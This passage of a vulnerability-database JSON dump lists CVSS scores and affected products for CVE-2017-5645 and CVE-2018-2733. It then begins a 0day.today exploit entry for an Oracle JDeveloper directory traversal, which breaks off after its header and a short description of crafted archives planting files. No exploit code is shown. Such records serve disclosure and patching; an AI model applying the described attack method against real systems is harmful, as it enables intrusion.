"confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5645"], "modified": "2022-04-04T16:53:00", "cpe": ["cpe:/o:redhat:enterprise_linux_server_eus:7.4", "cpe:/a:oracle:enterprise_manager_for_fusion_middleware:13.2.0.0", "cpe:/a:oracle:autovue_vuelink_integration:21.0.0", "cpe:/o:redhat:enterprise_linux_server_tus:7.4", "cpe:/o:redhat:enterprise_linux_server_aus:7.4", "cpe:/a:oracle:policy_automation_for_mobile_devices:10.4.7", "cpe:/a:oracle:retail_integration_bus:14.1.0", "cpe:/a:oracle:bi_publisher:11.1.1.7.0", "cpe:/a:oracle:configuration_manager:12.1.2.0.2", "cpe:/a:oracle:insurance_policy_administration:10.0", "cpe:/a:oracle:financial_services_analytical_applications_infrastructure:8.0.7.0.0", "cpe:/a:oracle:policy_automation_for_mobile_devices:12.1.0", "cpe:/a:oracle:policy_automation_for_mobile_devices:12.2.6", "cpe:/a:oracle:communications_interactive_session_recorder:6.2", "cpe:/a:netapp:storage_automation_store:-", "cpe:/a:oracle:policy_automation:12.2.6", "cpe:/a:oracle:enterprise_manager_for_peoplesoft:13.2.1.1", "cpe:/a:oracle:enterprise_manager_base_platform:12.1.0.5", "cpe:/a:oracle:financial_services_loan_loss_forecasting_and_provisioning:8.0.5", "cpe:/a:oracle:weblogic_server:12.2.1.4.0", "cpe:/a:oracle:flexcube_investor_servicing:12.4.0", "cpe:/a:oracle:identity_manager_connector:9.0", "cpe:/a:oracle:instantis_enterprisetrack:17.3", "cpe:/a:oracle:financial_services_lending_and_leasing:12.5.0", "cpe:/a:oracle:retail_open_commerce_platform:6.0.1", "cpe:/o:redhat:enterprise_linux:6.0", "cpe:/a:oracle:policy_automation_for_mobile_devices:12.2.0", "cpe:/a:oracle:mysql_enterprise_monitor:8.0.0.8131", "cpe:/o:redhat:enterprise_linux:7.5", "cpe:/a:oracle:financial_services_profitability_management:6.1.1", "cpe:/a:oracle:enterprise_manager_for_mysql_database:13.2.2.0.0", "cpe:/a:oracle:financial_services_loan_loss_forecasting_and_provisioning:8.0.4", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/a:oracle:weblogic_server:10.3.6.0.0", "cpe:/a:oracle:utilities_work_and_asset_management:1.9.1.2.12", "cpe:/a:oracle:autovue_vuelink_integration:21.0.1", "cpe:/a:oracle:policy_automation_for_mobile_devices:12.2.9", "cpe:/a:oracle:flexcube_investor_servicing:12.0.4", "cpe:/a:oracle:policy_automation_for_mobile_devices:12.2.7", "cpe:/a:oracle:communications_online_mediation_controller:6.1", "cpe:/a:oracle:retail_advanced_inventory_planning:14.0", "cpe:/a:oracle:policy_automation_for_mobile_devices:12.2.4", "cpe:/o:redhat:enterprise_linux:7.0", "cpe:/a:oracle:retail_service_backbone:15.0", "cpe:/a:oracle:soa_suite:12.2.1.3.0", "cpe:/a:oracle:insurance_rules_palette:11.0", "cpe:/a:oracle:insurance_rules_palette:11.1", "cpe:/a:oracle:enterprise_manager_for_oracle_database:12.1.0.8", "cpe:/a:oracle:in-memory_performance-driven_planning:12.2", "cpe:/a:netapp:oncommand_api_services:-", "cpe:/a:oracle:jd_edwards_enterpriseone_tools:9.2", "cpe:/a:oracle:financial_services_profitability_management:8.0.7.0.0", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/a:oracle:enterprise_manager_for_peoplesoft:13.1.1.1", "cpe:/a:oracle:communications_network_integrity:7.3.6", "cpe:/a:oracle:fusion_middleware_mapviewer:12.2.1.3", "cpe:/a:oracle:jdeveloper:12.2.1.3.0", "cpe:/a:oracle:insurance_policy_administration:10.2", "cpe:/a:oracle:retail_advanced_inventory_planning:15.0", "cpe:/a:netapp:oncommand_insight:-", "cpe:/a:oracle:policy_automation_for_mobile_devices:12.1.1", "cpe:/o:redhat:enterprise_linux_server_tus:7.6", "cpe:/a:oracle:rapid_planning:12.1", "cpe:/a:oracle:flexcube_investor_servicing:12.1.0", "cpe:/a:oracle:insurance_calculation_engine:10.1.1", "cpe:/a:oracle:primavera_gateway:16.2.11", "cpe:/a:oracle:flexcube_investor_servicing:12.3.0", "cpe:/a:oracle:policy_automation_for_mobile_devices:12.2.2", "cpe:/a:oracle:weblogic_server:14.1.1.0.0", "cpe:/a:oracle:retail_extract_transform_and_load:13.0", "cpe:/a:oracle:financial_services_hedge_management_and_ifrs_valuations:8.0.4", "cpe:/a:oracle:rapid_planning:12.2", "cpe:/a:oracle:financial_services_behavior_detection_platform:6.1.1", "cpe:/a:oracle:communications_pricing_design_center:12.0", "cpe:/a:oracle:policy_automation_for_mobile_devices:12.2.10", "cpe:/a:oracle:insurance_rules_palette:10.0", "cpe:/a:oracle:identity_management_suite:11.1.2.3.0", "cpe:/a:oracle:retail_integration_bus:14.0.0", "cpe:/a:oracle:retail_open_commerce_platform:5.3.0", "cpe:/a:oracle:communications_instant_messaging_server:10.0.1.3.0", "cpe:/a:oracle:api_gateway:11.1.2.4.0", "cpe:/o:redhat:enterprise_linux:6.7", "cpe:/a:oracle:fusion_middleware_mapviewer:12.2.1.2", "cpe:/a:oracle:retail_open_commerce_platform:6.0.0", "cpe:/a:oracle:communications_service_broker:6.0", "cpe:/a:oracle:policy_automation_for_mobile_devices:12.2.1", "cpe:/a:oracle:flexcube_investor_servicing:14.0.0", "cpe:/a:oracle:goldengate_application_adapters:12.3.2.1.1", "cpe:/a:oracle:endeca_information_discovery_studio:3.2.0", "cpe:/a:oracle:siebel_ui_framework:18.7", "cpe:/a:oracle:goldengate:12.3.2.1.1", "cpe:/a:oracle:bi_publisher:12.2.1.4.0", "cpe:/a:oracle:in-memory_performance-driven_planning:12.1", "cpe:/a:oracle:retail_clearance_optimization_engine:14.0.5", "cpe:/a:oracle:insurance_rules_palette:10.1", "cpe:/a:oracle:peoplesoft_enterprise_fin_install:9.2", "cpe:/a:oracle:retail_service_backbone:14.1", "cpe:/a:oracle:policy_automation:12.2.0", "cpe:/a:oracle:financial_services_analytical_applications_infrastructure:7.3.3.0.2", "cpe:/o:redhat:enterprise_linux_server_eus:7.6", "cpe:/a:oracle:policy_automation:10.4.7", "cpe:/a:oracle:retail_extract_transform_and_load:13.1", "cpe:/a:oracle:retail_integration_bus:16.0", "cpe:/a:oracle:application_testing_suite:13.3.0.1", "cpe:/a:oracle:financial_services_behavior_detection_platform:8.0.4.0.0", "cpe:/o:redhat:enterprise_linux:7.4", "cpe:/a:oracle:retail_integration_bus:15.0", "cpe:/a:oracle:soa_suite:12.2.2.0.0", "cpe:/a:oracle:policy_automation_for_mobile_devices:12.2.3", "cpe:/a:oracle:retail_predictive_application_server:15.0.3", "cpe:/a:oracle:financial_services_lending_and_leasing:14.8.0", "cpe:/a:oracle:insurance_rules_palette:10.2", "cpe:/a:oracle:communications_converged_application_server_-_service_controller:6.1", "cpe:/o:redhat:enterprise_linux_server_aus:7.6", "cpe:/a:oracle:identity_management_suite:12.2.1.3.0", "cpe:/a:oracle:policy_automation_connector_for_siebel:10.4.6", "cpe:/a:oracle:siebel_ui_framework:18.9", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/a:oracle:retail_service_backbone:16.0", "cpe:/a:oracle:policy_automation:12.2.3", "cpe:/a:oracle:policy_automation:12.2.4", "cpe:/a:netapp:snapcenter:-", "cpe:/a:oracle:banking_platform:2.6.2", "cpe:/a:oracle:insurance_policy_administration:10.1", "cpe:/a:oracle:policy_automation:12.2.5", "cpe:/a:oracle:policy_automation:12.1.0", "cpe:/a:oracle:enterprise_manager_for_fusion_middleware:12.1.0.5", "cpe:/a:oracle:insurance_calculation_engine:10.2.1", "cpe:/a:oracle:financial_services_regulatory_reporting_with_agilereporter:8.0.9.2.0", "cpe:/a:oracle:banking_platform:2.6.1", "cpe:/a:oracle:banking_platform:2.6.0", "cpe:/a:oracle:configuration_manager:12.1.2.0.5", "cpe:/a:oracle:financial_services_hedge_management_and_ifrs_valuations:8.0.5", "cpe:/a:oracle:policy_automation_for_mobile_devices:12.2.5", "cpe:/a:oracle:jdeveloper:11.1.1.9.0", "cpe:/a:oracle:policy_automation:12.2.2", "cpe:/a:oracle:insurance_policy_administration:11.0", "cpe:/o:redhat:enterprise_linux:7.3", "cpe:/a:oracle:policy_automation:12.2.8", "cpe:/a:oracle:utilities_advanced_spatial_and_operational_analytics:2.7.0.1", "cpe:/a:oracle:policy_automation:12.2.7", "cpe:/a:oracle:jdeveloper:12.1.3.0.0", "cpe:/a:oracle:retail_extract_transform_and_load:13.2", "cpe:/a:oracle:enterprise_data_quality:12.2.1.3.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.5", "cpe:/a:oracle:communications_pricing_design_center:11.1", "cpe:/a:oracle:retail_extract_transform_and_load:19.0", "cpe:/a:oracle:jd_edwards_enterpriseone_tools:4.0.1.0", "cpe:/a:oracle:bi_publisher:12.2.1.3.0", "cpe:/a:netapp:oncommand_workflow_automation:-", "cpe:/a:oracle:policy_automation:12.2.9", "cpe:/a:oracle:timesten_in-memory_database:11.2.2.8.49", "cpe:/a:oracle:soa_suite:12.1.3.0.0", "cpe:/a:oracle:identity_analytics:11.1.1.5.8", "cpe:/a:oracle:enterprise_manager_base_platform:13.2.0.0", "cpe:/a:oracle:mysql_enterprise_monitor:3.4.7.4297", "cpe:/a:oracle:mysql_enterprise_monitor:4.0.4.5235", "cpe:/a:redhat:fuse:1.0", "cpe:/a:oracle:bi_publisher:11.1.1.9.0", "cpe:/a:oracle:policy_automation:12.2.10", "cpe:/a:oracle:policy_automation:12.1.1", "cpe:/a:oracle:primavera_gateway:17.12.7", "cpe:/a:oracle:policy_automation:12.2.1", "cpe:/a:netapp:service_level_manager:-", "cpe:/a:oracle:siebel_ui_framework:18.8", "cpe:/a:oracle:weblogic_server:12.2.1.3.0", "cpe:/a:oracle:enterprise_manager_for_oracle_database:13.2.2", "cpe:/a:oracle:weblogic_server:12.1.3.0.0", "cpe:/a:oracle:tape_library_acsls:8.4", "cpe:/a:oracle:policy_automation_for_mobile_devices:12.2.8", "cpe:/o:redhat:enterprise_linux:7.6"], "id": "CVE-2017-5645", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5645", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:netapp:oncommand_api_services:-:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdeveloper:12.1.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation:12.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:flexcube_investor_servicing:12.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_for_peoplesoft:13.2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_integration_bus:15.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_instant_messaging_server:10.0.1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:bi_publisher:11.1.1.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation:12.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:soa_suite:12.2.2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:in-memory_performance-driven_planning:12.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_policy_administration:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_profitability_management:8.0.7.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:4.0.1.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:identity_manager_connector:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:endeca_information_discovery_studio:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_interactive_session_recorder:6.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_base_platform:12.1.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:10.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_predictive_application_server:15.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:siebel_ui_framework:18.9:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_online_mediation_controller:6.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:flexcube_investor_servicing:12.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:fusion_middleware_mapviewer:12.2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:identity_analytics:11.1.1.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.10:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation:12.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:7.3.3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:configuration_manager:12.1.2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:10.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_extract_transform_and_load:13.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation:12.2.10:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:in-memory_performance-driven_planning:12.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_platform:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:fusion_middleware_mapviewer:12.2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.7:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_policy_administration:10.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:rapid_planning:12.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:siebel_ui_framework:18.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:instantis_enterprisetrack:17.3:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_behavior_detection_platform:8.0.4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:identity_management_suite:11.1.2.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:bi_publisher:11.1.1.7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:identity_management_suite:12.2.1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation:12.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:tape_library_acsls:8.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_profitability_management:6.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_pricing_design_center:12.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_policy_administration:10.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:8.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_for_oracle_database:12.1.0.8:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation:10.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:application_testing_suite:13.3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_for_fusion_middleware:13.2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:10.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_open_commerce_platform:6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_for_oracle_database:13.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_integration_bus:14.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation:12.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:siebel_ui_framework:18.7:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.3:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_extract_transform_and_load:13.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:8.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:8.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:utilities_advanced_spatial_and_operational_analytics:2.7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_service_backbone:16.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_advanced_inventory_planning:15.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_lending_and_leasing:14.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_behavior_detection_platform:6.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:goldengate_application_adapters:12.3.2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_service_backbone:15.0:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_insight:-:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_pricing_design_center:11.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_regulatory_reporting_with_agilereporter:8.0.9.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:soa_suite:12.1.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:bi_publisher:12.2.1.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:bi_publisher:12.2.1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation:12.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_workflow_automation:-:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.7.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:snapcenter:-:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_policy_administration:10.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_platform:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdeveloper:11.1.1.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_integration_bus:16.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:peoplesoft_enterprise_fin_install:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_converged_application_server_-_service_controller:6.1:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:storage_automation_store:-:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_open_commerce_platform:5.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation:12.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_gateway:16.2.11:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_extract_transform_and_load:19.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql_enterprise_monitor:8.0.0.8131:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_gateway:17.12.7:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_for_mysql_database:13.2.2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:service_level_manager:-:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:utilities_work_and_asset_management:1.9.1.2.12:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:fuse:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.5:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_extract_transform_and_load:13.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:goldengate:12.3.2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_lending_and_leasing:12.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:timesten_in-memory_database:11.2.2.8.49:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:flexcube_investor_servicing:14.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:api_gateway:11.1.2.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:soa_suite:12.2.1.3.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:flexcube_investor_servicing:12.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql_enterprise_monitor:3.4.7.4297:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation:12.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_calculation_engine:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_open_commerce_platform:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_network_integrity:7.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:flexcube_investor_servicing:12.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:configuration_manager:12.1.2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_for_peoplesoft:13.1.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_calculation_engine:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_service_backbone:14.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation_connector_for_siebel:10.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:rapid_planning:12.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_for_fusion_middleware:12.1.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_advanced_inventory_planning:14.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.9:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation:12.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:autovue_vuelink_integration:21.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_service_broker:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_platform:2.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:8.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_integration_bus:14.0.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:autovue_vuelink_integration:21.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation:12.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql_enterprise_monitor:4.0.4.5235:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:11.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation:12.2.9:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_clearance_optimization_engine:14.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_data_quality:12.2.1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation:12.2.3:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-07T14:51:58", "description": "Vulnerability in the Oracle Hyperion Planning component of Oracle Hyperion (subcomponent: Security). The supported version that is affected is 11.1.2.4.007. Difficult to exploit vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle Hyperion Planning. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Hyperion Planning, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle Hyperion Planning. CVSS 3.0 Base Score 7.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H).", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.6, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2018-01-18T02:29:00", "type": "cve", "title": "CVE-2018-2733", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:N/AC:H/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2733"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:oracle:hyperion_planning:11.1.2.4.007"], "id": "CVE-2018-2733", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-2733", "cvss": {"score": 4.6, "vector": "AV:N/AC:H/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:oracle:hyperion_planning:11.1.2.4.007:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2018-04-02T05:24:50", "description": "Exploit for java platform in category web applications", "cvss3": {}, "published": "2018-01-18T00:00:00", "type": "zdt", "title": "Oracle JDeveloper IDE Directory Traversal Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-10273"], "modified": "2018-01-18T00:00:00", "id": "1337DAY-ID-29579", "href": "https://0day.today/exploit/description/29579", "sourceData": "[+] Credits: John Page (aka hyp3rlinx) \r\n\r\nVendor:\r\n=============\r\nwww.oracle.com\r\n\r\n\r\nProduct:\r\n===========\r\nJDeveloper IDE\r\n\r\nOracle JDeveloper is a free integrated development environment that simplifies the development of Java-based\r\napplications addressing every step of the application lifecycle.\r\n\r\n\r\n\r\nVulnerability Type:\r\n===================\r\nDirectory Traversal\r\n\r\n\r\n\r\nCVE Reference:\r\n==============\r\nCVE-2017-10273\r\n\r\n\r\n\r\nSecurity Issue:\r\n================\r\nAttackers can place malicious files outside intended target directories if tricked into importing corrupt .WAR or .EAR archives.\r\nLater, attackers can potentially request these scripts/files to execute system commands on affected target.\r\n\r\n\r\nAffected versions:\r\n11.1.1.7.0, 11.1.1.7.1, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0, 